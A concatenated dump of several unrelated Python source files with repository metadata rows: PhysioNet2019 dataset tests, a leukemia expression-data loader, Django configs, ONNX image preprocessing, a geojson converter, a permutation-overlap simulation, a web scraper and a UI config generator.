def test_zero_impute(self):
"""Test zero imputation."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute="zero",
seed=SEED,
)
# Check no NaNs post imputation
assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_mean_impute(self):
"""Test mean imputation."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute="mean",
seed=SEED,
)
# Check no NaNs post imputation
assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_forward_impute(self):
"""Test forward imputation."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute="forward",
seed=SEED,
)
# Check no NaNs post imputation
assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_custom_imputation_1(self):
"""Test custom imputation function."""
def impute_with_zero(X, y, fill, select):
return X.nan_to_num(0), y.nan_to_num(0)
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute=impute_with_zero,
seed=SEED,
)
# Check number of NaNs
assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_custom_imputation_2(self):
"""Test custom imputation function."""
def no_imputation(X, y, fill, select):
"""Does not impute data i.e. same as impute='none'"""
return X, y
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute=no_imputation,
seed=SEED,
)
# Check number of NaNs
assert torch.sum(torch.isnan(dataset.X_train)).item() == 366491058
assert torch.sum(torch.isnan(dataset.y_train)).item() == 8401181
assert torch.sum(torch.isnan(dataset.X_val)).item() == 104715681
assert torch.sum(torch.isnan(dataset.y_val)).item() == 2399984
assert torch.sum(torch.isnan(dataset.X_test)).item() == 52332856
assert torch.sum(torch.isnan(dataset.y_test)).item() == 1199521
def test_overwrite_data(self):
"""Overwrite cache and validate data set."""
PhysioNet2019(
split="train",
train_prop=0.7,
seed=SEED,
overwrite_cache=True,
)
if CHECKSUM_X:
assert _get_SHA256(".torchtime/physionet_2019/X" + OBJ_EXT) == CHECKSUM_X
if CHECKSUM_Y:
assert _get_SHA256(".torchtime/physionet_2019/y" + OBJ_EXT) == CHECKSUM_Y
if CHECKSUM_LENGTH:
assert (
_get_SHA256(".torchtime/physionet_2019/length" + OBJ_EXT)
== CHECKSUM_LENGTH
)
def test_time(self):
"""Test time argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
time=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 41])
assert dataset.X_val.shape == torch.Size([8067, 336, 41])
assert dataset.X_test.shape == torch.Size([4033, 336, 41])
# Check time channel
for i in range(182):
assert torch.equal(
dataset.X_train[:, i, 0],
torch.full([28236], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_val[:, i, 0],
torch.full([8067], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_test[:, i, 0],
torch.full([4033], fill_value=i, dtype=torch.float),
)
def test_no_time(self):
"""Test time argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
time=False,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 40])
assert dataset.X_val.shape == torch.Size([8067, 336, 40])
assert dataset.X_test.shape == torch.Size([4033, 336, 40])
def test_mask(self):
"""Test mask argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
time=False,
mask=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 80])
assert dataset.X_val.shape == torch.Size([8067, 336, 80])
assert dataset.X_test.shape == torch.Size([4033, 336, 80])
def test_delta(self):
"""Test time delta argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
time=False,
delta=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 80])
assert dataset.X_val.shape == torch.Size([8067, 336, 80])
assert dataset.X_test.shape == torch.Size([4033, 336, 80])
# Check time delta channel
assert torch.equal(
dataset.X_train[:, 0, 40], torch.zeros([28236], dtype=torch.float)
)
assert torch.equal(
dataset.X_val[:, 0, 40], torch.zeros([8067], dtype=torch.float)
)
assert torch.equal(
dataset.X_test[:, 0, 40], torch.zeros([4033], dtype=torch.float)
)
def test_time_mask_delta(self):
"""Test combination of time/mask/delta arguments."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
mask=True,
delta=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 121])
assert dataset.X_val.shape == torch.Size([8067, 336, 121])
assert dataset.X_test.shape == torch.Size([4033, 336, 121])
# Check time channel
for i in range(182):
assert torch.equal(
dataset.X_train[:, i, 0],
torch.full([28236], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_val[:, i, 0],
torch.full([8067], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_test[:, i, 0],
torch.full([4033], fill_value=i, dtype=torch.float),
)
# Check time delta channel
assert torch.equal(
dataset.X_train[:, 0, 81], torch.zeros([28236], dtype=torch.float)
)
assert torch.equal(
dataset.X_val[:, 0, 81], torch.zeros([8067], dtype=torch.float)
)
assert torch.equal(
dataset.X_test[:, 0, 81], torch.zeros([4033], dtype=torch.float)
)
    def test_standardisation(self):
"""Check training data is standardised."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
time=False,
standardise=True,
seed=SEED,
)
for c, Xc in enumerate(dataset.X_train.unbind(dim=-1)):
assert torch.allclose(
torch.nanmean(Xc), torch.Tensor([0.0]), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
torch.std(Xc[~torch.isnan(Xc)]),
torch.Tensor([1.0]),
rtol=RTOL,
atol=ATOL,
)
def test_reproducibility_1(self):
"""Test seed argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check first value in 39th channel
assert torch.allclose(
dataset.X_train[0, 0, 39], torch.tensor(-1.53), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
dataset.X_val[0, 0, 39], torch.tensor(-0.02), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
dataset.X_test[0, 0, 39], torch.tensor(-6.73), rtol=RTOL, atol=ATOL
)
def test_reproducibility_2(self):
"""Test seed argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
seed=999999,
)
# Check first value in 39th channel
assert torch.allclose(
dataset.X_train[0, 0, 39], torch.tensor(-13.01), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
dataset.X_val[0, 0, 39], torch.tensor(-109.75), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
dataset.X_test[0, 0, 39], torch.tensor(-131.18), rtol=RTOL, atol=ATOL
)
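# To run just this module (assumes pytest is installed and the PhysioNet 2019
# data can be downloaded or is already cached under .torchtime/):
#   pytest tests/data_physionet2019_test.py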
| [
"[email protected]"
] | |
33659941a8c7b53c1464ee3fca6f4abb4b38f1b2 | 805626d7ea7e702c26dd55e82cae647f0ea010de | /datasets/GSE13425/GSE13425Dataset.py | 9b998d86415be3c68f1225b196e78a9ce684ffbf | [] | no_license | krypty/BIO-SELECT | 6f3cc842c78f4986f9b420f1fd946828481df535 | b8030ee26420fefa7db8d970458738726c5b78f6 | refs/heads/master | 2021-03-16T06:52:30.418188 | 2018-12-19T07:47:53 | 2018-12-19T07:47:53 | 69,567,545 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,416 | py | import glob
import os
import re
import pandas as pd
from datasets.Dataset import Dataset
class GSE13425Dataset(Dataset):
def __init__(self):
# super() call is voluntarily omitted
        filename = r'./data/GSE13425/E-GEOD-13425-processed-data-1721486034.txt'
df = pd.read_csv(filename, sep="\t", header=None)
df = df.dropna() # ignore NaN values
df = df.transpose()
        self._X = df.iloc[1:, 2:].astype(float).values  # .iloc replaces the removed .ix indexer
self._y = []
        self._features_names = df.iloc[0, 2:].values
self._parse_features(None)
filenames = df[0][1:].values
self._sample_and_data = r'./data/GSE13425/samples-and-data.csv'
self._parse_labels(filenames)
def _parse_labels(self, filenames):
col_sample_name, col_sample_class = "Scan Name", "Comment [Sample_characteristics]"
df = pd.read_csv(self._sample_and_data, sep="\t", usecols=[col_sample_name, col_sample_class])
df = df.dropna() # ignore NaN values
for f in filenames:
sample_name = f
# get sample label name
label = df[df[col_sample_name] == sample_name][col_sample_class].iloc[0]
self._y.append(label)
# Regroup similar leukemias (11 subtypes into 7 main types of leukemia)
self._y = self._regroup_similar_leukemias(self._y)
def _parse_features(self, filename):
# idx -> name : nothing to do, done in __init__()
# name -> idx
self._features_indices = {feature: idx for (idx, feature) in enumerate(self._features_names)}
@staticmethod
def _regroup_similar_leukemias(_y):
"""
        Regroup similar leukemias together. The dataset labels contain many leukemia
        subtypes, which are merged here into the main groups defined in
        leukemia_types_lookup_table.
        :param _y: original classes from the dataset
        :return: regrouped classes with the main leukemia groups
"""
return map(translate_subtype_into_maintype_class, _y)
leukemia_types_lookup_table = {
"ALL-Hyperdiploid": [
"Precursor-B ALL, subtype: Hyperdiploid"
],
"ALL-ABL": [
"Precursor-B ALL, subtype: BCR-ABL",
"Precursor-B ALL, subtype: BCR-ABL (+hyperdiploidy)"
],
"ALL-E2A-rearranged": [
"Precursor-B ALL, subtype: E2A-rearranged (E-sub)",
"Precursor-B ALL, subtype: E2A-rearranged (E)",
"Precursor-B ALL, subtype: E2A-rearranged (EP)"
],
"ALL-MLL": [
"Precursor-B ALL, subtype: MLL"
],
"ALL-other": [
"Precursor-B ALL, subtype: other"
],
"ALL-TEL-AML1": [
"Precursor-B ALL, subtype: TEL-AML1",
"Precursor-B ALL, subtype: TEL-AML1 (+hyperdiploidy)"
],
"ALL": [
"T-ALL"
]
}
def translate_subtype_into_maintype_class(subtype):
    for k, v in leukemia_types_lookup_table.items():  # .items() works on both Python 2 and 3
if subtype in leukemia_types_lookup_table[k]:
return k
# in the case we do not find a matching type, we keep the original subtype
return subtype
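# e.g. translate_subtype_into_maintype_class("T-ALL") -> "ALL"
#      translate_subtype_into_maintype_class("Precursor-B ALL, subtype: MLL") -> "ALL-MLL"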
if __name__ == '__main__':
os.chdir("../..")
ds = GSE13425Dataset()
best_features_idx = [4, 10, 2]
best_features_names = ds.get_features_names(best_features_idx)
print(best_features_names)
print("----")
y = list(set(ds.get_y()))
print(y)
print(len(y))
| [
"[email protected]"
] | |
10f95e7b16db7916e3cdc3c061750179de5cfdb0 | 3a8a3f07b75bdf508b8edc87b1239077afce4bce | /djangophx/wsgi.py | 417e400e892c60c2760fbb4e1b170278de2147cd | [
"MIT"
] | permissive | djangophx/djangophx-web | 5ba5c167d57dc85d17d8f9acbe81f9e389b3c8f4 | 974df5b461f96e5291b14f04567b9aac283766da | refs/heads/master | 2020-12-31T00:53:15.813272 | 2017-01-31T22:33:28 | 2017-01-31T22:51:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | """
WSGI config for djangophx project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
from __future__ import absolute_import, unicode_literals
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangophx.settings.dev")
application = get_wsgi_application()
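# Example (hypothetical deployment command, assumes gunicorn is installed):
#   gunicorn djangophx.wsgi:application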
| [
"[email protected]"
] | |
06bc48d4bc287fb3d1caae1b82df7092d6343645 | ed7c28b78e39f607e122f62b4c008661643385ae | /Message/urls.py | cdebab595981258e09d774fde4db06756f10d1c2 | [] | no_license | basu-dev/MobileVersionRaven | 507d0226fc0cc95ab5bd21ebebf6813e532fb1e4 | a1aa66a2bc9541c9fbbfbfa97fddfb6adea273e5 | refs/heads/master | 2020-07-01T07:30:56.554113 | 2019-08-05T15:58:28 | 2019-08-05T15:58:28 | 201,090,203 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | from django.urls import path
from . import views
urlpatterns=[
path('',views.message_list),
path('message/<int:id>/',views.chatroom),
path('save_message/<int:id>/',views.save_message),
]
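# Resulting routes (illustrative requests):
#   GET /                 -> views.message_list
#   GET /message/5/       -> views.chatroom(request, id=5)
#   GET /save_message/5/  -> views.save_message(request, id=5)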
| [
"[email protected]"
] | |
1f804536a86d59b90964fd47c07595a61a7c1fb8 | 44678e46766332e715c09ebd4bd93c57d75d650a | /part2/5-human-pose-estimation-onnx/aws_deployment/s5-hpe-onnx-aws/utils/hpe_transform_utils.py | b54aface0aa2ae8f8f1b8cd597aeacb29dda780e | [] | no_license | birender-panwar/vision-ai | ff3368c07adbf6760e11a8c764e66877c96b20d6 | 11b44e42e08bab534b3a41bfef4ebcc9a772fde2 | refs/heads/main | 2022-12-28T18:40:22.955969 | 2020-10-18T10:59:53 | 2020-10-18T10:59:53 | 304,915,469 | 0 | 1 | null | 2020-10-18T05:00:24 | 2020-10-17T16:02:37 | null | UTF-8 | Python | false | false | 1,058 | py |
import numpy as np
import PIL
def img_normalize(img, means, stds):
"""
Args:
        img (numpy.ndarray): Image of size (C, H, W) to be normalized.
        means, stds: per-channel means and standard deviations.
    Returns:
        numpy.ndarray: Normalized image.
"""
for i in range(3):
img[i] = np.divide(np.subtract(img[i], means[i]), stds[i])
img[i] = np.nan_to_num(img[i])
return img
def HWC_2_CHW(img):
H, W, C = img.shape
im = np.zeros((C,H,W),dtype=np.float32)
for i in range(C):
im[i] = img[:,:,i]
return im
# img: PIL Image data
def transform_image(img: PIL.Image.Image):
img = img.resize((256,256), PIL.Image.BICUBIC) # resizing image
img = np.asarray(img)
# converting from HWC to CHW format
img_chw = HWC_2_CHW(img)
# Convert image to floating point in the range 0 to 1
img_chw = np.float32(img_chw)/255.0
# Normalizing image data
means, stds = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]
img_chw = img_normalize(img_chw, means, stds)
img_chw = np.expand_dims(img_chw, axis=0) # Making batch size of 1
return img_chw
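# Minimal usage sketch (editor addition; the image and model paths are assumptions):
#   import onnxruntime as ort
#   img = PIL.Image.open("person.jpg").convert("RGB")
#   batch = transform_image(img)  # numpy float32 array of shape (1, 3, 256, 256)
#   sess = ort.InferenceSession("pose_model.onnx")
#   outputs = sess.run(None, {sess.get_inputs()[0].name: batch})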
| [
"[email protected]"
] | |
95cc14cdf4a2934e17ff077a41433ca964850f07 | 8afb5afd38548c631f6f9536846039ef6cb297b9 | /GIT-USERS/amitness/maptools/geo/set_province_geo_properties_from_oknp.py | dafa719280d1c97b63ddefc7733031115fe807d1 | [
"MIT"
] | permissive | bgoonz/UsefulResourceRepo2.0 | d87588ffd668bb498f7787b896cc7b20d83ce0ad | 2cb4b45dd14a230aa0e800042e893f8dfb23beda | refs/heads/master | 2023-03-17T01:22:05.254751 | 2022-08-11T03:18:22 | 2022-08-11T03:18:22 | 382,628,698 | 10 | 12 | MIT | 2022-10-10T14:13:54 | 2021-07-03T13:58:52 | null | UTF-8 | Python | false | false | 2,055 | py | import getopt
import json
import re
import sys
"""
Script to manipulate the properties of each province in the OKNP geojson file
in the geo repository and convert each to the format needed for NepalMap
"""
def convert_json(input_file, output_file):
with open(input_file, "r") as data_file:
data = json.load(data_file)
def build_wazimap_feature(feature):
old_type = feature["type"]
old_geometry = feature["geometry"]
old_properties = feature["properties"]
code = str(old_properties["D_ID"])
name = str(old_properties["Title"])
new_properties = {
"code": code,
"name": name,
"geoid": "{}-{}".format("province", code),
"level": "province",
}
return {
"type": old_type,
"geometry": old_geometry,
"properties": new_properties,
}
features = list(map(lambda f: build_wazimap_feature(f), data["features"]))
new_collection = dict(type=data["type"], features=features)
with open(output_file, "w") as json_out:
json.dump(new_collection, json_out, ensure_ascii=False)
print("Done!")
def main(args):
inputjson = ""
outputjson = ""
try:
opts, args = getopt.getopt(args, "hi:o:", ["inputjson=", "outputjson="])
except getopt.GetoptError:
print("python set_province_geo_properties.py -i <inputjson> -o <outputjson>")
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print(
"python set_province_geo_properties.py "
"-i <inputjson> "
"-o <outputjson>"
)
sys.exit()
elif opt in ("-i", "--inputjson"):
inputjson = arg
elif opt in ("-o", "--outputjson"):
outputjson = arg
convert_json(inputjson, outputjson)
if __name__ == "__main__":
main(sys.argv[1:])
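# Example invocation (file names are illustrative):
#   python set_province_geo_properties_from_oknp.py -i province_oknp.geojson -o province.geojson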
| [
"[email protected]"
] | |
8d7b72953bd990794b6c55c952c15b2bb38d0103 | de2a58f593b1955550bd49ce512353b7561723f5 | /Scrapper.py | d18002d65c0b97250d322a9a39cf377001320bba | [] | no_license | antonymwangig/start | d687dad738bfc5421bade7bfeeddeef8d36f3849 | 9042e6caff6592d143256816e5bbbf7ca4614a36 | refs/heads/master | 2021-05-14T11:55:22.310711 | 2018-01-05T14:39:13 | 2018-01-05T14:39:13 | 116,393,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,160 | py | from bs4 import BeautifulSoup
from Urls import Url
from Keywords import keywords
class Scrap:
def __init__(self,response,currentHost):
self.response=response
if currentHost.endswith("/"):
self.currentHost=currentHost[:-1]
else:
self.currentHost=currentHost
        self.soup = BeautifulSoup(response, "html.parser")  # explicit parser avoids bs4's guessed-parser warning
self.CheckForUrl()
self.CheckData()
def CheckForUrl(self):
links=self.soup.find_all("a")
for link in links:
try:
Url_link=str(link.get("href"))
if Url_link.startswith("http://") or Url_link.startswith("https://"):
Url().SetUrlToVisit(Url_link)
elif Url_link.startswith("www"):
Url().SetUrlToVisit("http://"+Url_link)
elif Url_link.startswith("/"):
#Url().SetUrlToVisit(self.currentHost+Url_link)
pass
except:
pass
def CheckData(self):
all_tags=self.soup.body.find_all_next()
#print(all_tags)
count=0
for tag in all_tags:
# print("\n\n\n\n"+str(tag))
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).div.attrs
if keywords().isPriceKeyword(dict_tags):
#print(BeautifulSoup(str(tag)).div.find_all_next())
# if len(BeautifulSoup(str(tag)).div.find_all_next())>2:
c=count
while c>0:
soup2=BeautifulSoup("""<p><div>{}</div></p>""".format(str(all_tags[c])))
all_tags2=soup2.div.find_all_next()
print("")
if self.CheckPrice(all_tags2) and self.CheckProduct(all_tags2):
print(all_tags2.string)
break
c=c-1
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).span.attrs
if keywords().isPriceKeyword(dict_tags):
# if len(BeautifulSoup(str(tag)).div.find_all_next())>2:
c=count
while c>0:
soup2=BeautifulSoup("""<p>{}</p>""".format(str(all_tags[c])))
all_tags2=soup2.p.find_all_next()
print("\n\n\n"+str(all_tags2))
if self.CheckPrice(all_tags2) and self.CheckProduct(all_tags2):
print(all_tags2.string)
break
c=c-1
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dt.attrs
if keywords().isPriceKeyword(dict_tags):
# if len(BeautifulSoup(str(tag)).div.find_all_next())>2:
c=count
while c>0:
soup2=BeautifulSoup("""<p><div>{}</div></p>""".format(str(all_tags[c])))
all_tags2=soup2.dt.find_all_next()
if self.CheckPrice(all_tags2) and self.CheckProduct(all_tags2):
print(all_tags2.string)
break
c=c-1
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dd.attrs
if keywords().isPriceKeyword(dict_tags):
# if len(BeautifulSoup(str(tag)).div.find_all_next())>2:
c=count
while c>0:
soup2=BeautifulSoup("""<p><div>{}</div></p>""".format(str(all_tags[c])))
all_tags2=soup2.dd.find_all_next()
if self.CheckPrice(all_tags2) and self.CheckProduct(all_tags2):
print(all_tags2.string)
break
c=c-1
except:
pass
count=count+1
def CheckProduct(self,all_tags2):
for tag in all_tags2:
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).div.attrs
if keywords().isProductKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).span.attrs
if keywords().isProductKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dt.attrs
if keywords().isProductKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dd.attrs
if keywords().isProductKeyword(dict_tags):
return True
except:
pass
return False
def CheckPrice(self,all_tags2):
for tag in all_tags2:
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).div.attrs
if keywords().isPriceKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).span.attrs
if keywords().isPriceKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dt.attrs
if keywords().isPriceKeyword(dict_tags):
return True
except:
pass
try:
dict_tags=BeautifulSoup("""<p>{}</p>""".format(str(tag))).dd.attrs
if keywords().isPriceKeyword(dict_tags):
return True
except:
pass
return False
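# Rough usage sketch (assumes the sibling Urls and Keywords modules are importable
# and `html` holds a fetched page body); construction runs CheckForUrl() and
# CheckData() immediately:
#   scrap = Scrap(html, "http://example.com/")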
| [
"[email protected]"
] | |
f97bc904b7b78adaeac41e756b9d7ccf05ea023f | 74877cb0c82e46265f62991b07a55618e7691afd | /permutation_based_simulation/permutation_based_simulation.py | e1dd5594ad9b9a917b3d5c4756eb8f3f83bf87a5 | [
"MIT"
] | permissive | hmmhdnr/molecular_network_analysis_multidimentional_vector | 230422fc4ede31439565bee15ce3306c89c9e49e | 3a79bf3b6bb3a80e82bc035c51a32d35d328bb6d | refs/heads/main | 2023-04-18T08:50:56.204133 | 2021-07-06T04:43:28 | 2021-07-06T04:43:28 | 383,046,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,196 | py | import pandas as pd
from itertools import groupby
from multiprocessing import Pool
import time
import datetime
import os
import random
# permutation-based simulation
# 2021/5/27 by H.Homma
ListSize = 1965
Size_A = 73
Size_B = 62
Expected_Overwrap_Size = 43
bootstrap_N = 10000
Dir_output = 'result_from_all_proteins'
cpu_count = min(16, os.cpu_count())
TaskID = 0
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--task_id", help="Task ID for parallel", type=int)
parser.add_argument("--size_a", help="size of list_A", type=int)
parser.add_argument("--size_b", help="size of list_B", type=int)
parser.add_argument("--population_size", help="size of population", type=int)
parser.add_argument("-B", help="number of bootstrap trials", type=int)
parser.add_argument("-E", help="Expected overwrap size", type=int)
parser.add_argument("-d", help="output directory", type=str)
args = parser.parse_args()
if args.task_id is not None:
TaskID = args.task_id
if args.size_a is not None:
Size_A = args.size_a
if args.size_b is not None:
Size_B = args.size_b
if args.population_size is not None:
ListSize = args.population_size
if args.B is not None:
bootstrap_N = args.B
if args.E is not None:
Expected_Overwrap_Size = args.E
if args.d is not None:
Dir_output = args.d
if not os.path.isdir(Dir_output):
os.makedirs(Dir_output)
def init(_a, _b, _l):
global A, B, ALL
A = _a
B = _b
ALL = _l
def split_iter(iterable, N=3):
for i, item in groupby(enumerate(iterable), lambda x: x[0] // N):
yield (x[1] for x in item)
def overwrap_ratio(idx):
la = random.sample(range(ALL), A)
lb = random.sample(range(ALL), B)
intersect = sorted(list(set(la) & set(lb)))
union = sorted(list(set(la) | set(lb)))
return idx, len(la), len(lb), len(intersect), len(union), len(intersect)/len(union), ','.join([str(x) for x in intersect]), ','.join([str(x) for x in union])
def overwrap_ratio_wrapper(args):
return overwrap_ratio(*args)
if __name__ == '__main__':
expected_list_size = Size_A + Size_B - Expected_Overwrap_Size
expected_ratio = Expected_Overwrap_Size / expected_list_size
print("bootstrap size_A = %d, size_B = %d from population of size %d" % (Size_A, Size_B, ListSize))
print("expected list size = %d, expected overwrap size = %d, expected overwrap ratio = %f" % (expected_list_size, Expected_Overwrap_Size, expected_ratio))
pool = Pool(cpu_count, initializer=init, initargs=(Size_A, Size_B, ListSize))
result = pool.map(overwrap_ratio, range(bootstrap_N))
x = pd.DataFrame(result, columns=['index', 'size_a', 'size_b', 'size_intersect', 'size_union', 'overwrap_ratio', 'intersection', 'union']).set_index('index')
x.to_csv(os.path.join(Dir_output, "permutation_result_for_core_network_task%d.tsv" % TaskID), sep='\t')
ratios = x.loc[:,"overwrap_ratio"]
r = [o for o in ratios if o >= expected_ratio]
print("%d samples were greater than or equal to the expected value" % len(r))
print("probability of expected ratio (%f) is %f for %d bootstrap samples" % (expected_ratio, len(r)/len(ratios), len(ratios)))
pool.close()
pool.terminate()
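# Example run (flags mirror the argparse options defined above):
#   python permutation_based_simulation.py --size_a 73 --size_b 62 \
#       --population_size 1965 -B 10000 -E 43 -d result_from_all_proteins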
| [
"[email protected]"
] | |
8714f66bb60c609dd43c55d3d0061cde1805382b | 1141cd4aeffafe496bb7d8a1399ca7c8445edd6e | /tests/ui_tests/test_field_ui_options_data/config_generator.py | f1f37c951a3276fe66171bfd21965f2c0877d79b | [
"Apache-2.0"
] | permissive | amleshkov/adcm | d338c3b7c51e38ffe9a0b2715c85e54bed0c4f46 | e1c67e3041437ad9e17dccc6c95c5ac02184eddb | refs/heads/master | 2020-11-30T15:35:57.456194 | 2019-12-16T20:27:06 | 2019-12-16T20:27:06 | 230,432,278 | 0 | 0 | NOASSERTION | 2019-12-27T11:30:23 | 2019-12-27T11:30:22 | null | UTF-8 | Python | false | false | 3,115 | py | import os
import yaml
DATA = [("invisible", "true", "advanced", "true"), ("invisible", "false", "advanced", "false"),
("invisible", "false", "advanced", "true"), ('invisible', "true", "advanced", "false")]
TYPES = ("string", "password", "integer", "text", 'boolean', 'float', 'option', 'list', 'map', 'json', 'file')
template_textboxes = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: {4}
ui_options:
{0}: {1}
{2}: {3}
"""
template_password = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: password
ui_options:
{0}: {1}
{2}: {3}
"""
template_text = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: text
ui_options:
{0}: {1}
{2}: {3}
"""
template_numbers = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: 1
ui_options:
{0}: {1}
{2}: {3}
"""
template_boolean = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: true
ui_options:
{0}: {1}
{2}: {3}
"""
template_file = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
ui_options:
{0}: {1}
{2}: {3}
"""
template_json = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default: {{}}
ui_options:
{0}: {1}
{2}: {3}
"""
template_map = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default:
name: Joe
age: "24"
sex: m
ui_options:
{0}: {1}
{2}: {3}
"""
template_list = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
default:
- /dev/rdisk0s1
- /dev/rdisk0s2
- /dev/rdisk0s3
ui_options:
{0}: {1}
{2}: {3}
"""
template_option = """
- type: cluster
name: {0}_{1}_{2}_{3}_{4}
version: 1
config:
- name: {4}
type: {4}
option: {{http: 80, https: 443}}
default: 80
ui_options:
{0}: {1}
{2}: {3}
"""
TEMPLATES = {"string": template_textboxes, "password": template_password, "integer": template_numbers,
"text": template_text, 'boolean': template_boolean, 'float': template_numbers,
'option': template_option, 'list': template_list, 'map': template_map,
'json': template_json, 'file': template_file}
for t in TYPES:
for config in DATA:
d_name = "{}_{}/{}_{}/{}".format(config[0], config[1], config[2], config[3], t)
os.makedirs(d_name)
with open("{}/config.yaml".format(d_name), "w+") as f:
f.write(TEMPLATES[t].format(config[0], config[1], config[2], config[3], t))
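# Each (ui_options, type) combination yields a bundle config such as
# invisible_true/advanced_true/string/config.yaml, rendered from the matching template.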
| [
"[email protected]"
] | |
47aefb1dc88c20f09ca380b4a5f6ac27436692b7 | f238ec97ddc6922d0888eb625281a91209ab8c6c | /google_yoda/yoda_speak/models.py | 4aafb2ec8cabf6ce8f18cbfbcd64d6d4e6cd2ef7 | [
"MIT"
